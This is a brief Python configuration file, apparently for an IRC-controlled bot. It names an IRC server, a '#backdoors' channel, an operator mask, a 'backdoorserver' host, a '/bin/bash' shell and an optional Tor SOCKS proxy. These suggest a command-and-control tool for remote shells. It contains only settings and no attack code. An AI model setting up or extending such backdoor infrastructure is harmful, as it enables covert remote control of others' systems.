# which irc server to use
host = 'irc.efnet.org'
# port of irc server
port = 6697
#whether server uses ssl
ssl = True

proxies = None # ['socks4://127.0.0.1:9050']

botnick = 'i_am_a_bot'
channel = '#backdoors'
opmask = 'username@unaffiliated/username'
backdoorserver = 'myhost.dyndns.org'
shell = '/bin/bash'
debug = False

